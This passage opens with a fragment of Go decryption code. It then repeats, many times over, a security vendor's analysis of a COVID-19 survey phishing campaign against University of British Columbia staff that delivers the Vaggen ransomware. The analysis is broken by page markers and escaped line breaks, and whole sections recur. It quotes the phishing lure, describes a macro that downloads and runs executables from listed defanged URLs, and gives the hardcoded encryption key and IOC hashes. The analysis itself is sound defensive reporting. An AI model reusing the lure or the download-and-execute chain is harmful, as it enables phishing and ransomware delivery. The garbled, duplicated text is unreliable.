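	fmt.Println("tampered file rejected:", err != nil)
}
```

The tag check is what makes this safe to run over a directory of encrypted files: a file that was not produced with this key, or that was damaged, is reported as an error rather than written out as corrupted plaintext.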
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1561 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1562 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1563 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1564 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1565 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1566 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1567 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1568 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1569 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1570 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1571 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1572 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1573 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1574 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1575 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1576 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1577 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1578 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1579 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1580 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1581 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1582 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims in exchange for recovering their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\n
According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell call to determine whether it was successful (on success, the return value is the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs.\r\nThis can be very useful as an early warning system that an intruder has gained access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The main ones correspond to the following functionality:\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\n
Some of the strings used by the malware (for example the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements (the key from the binary, and the nonce and tag stored in each encrypted file), we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1593 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1594 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1595 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1596 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1597 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1598 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or 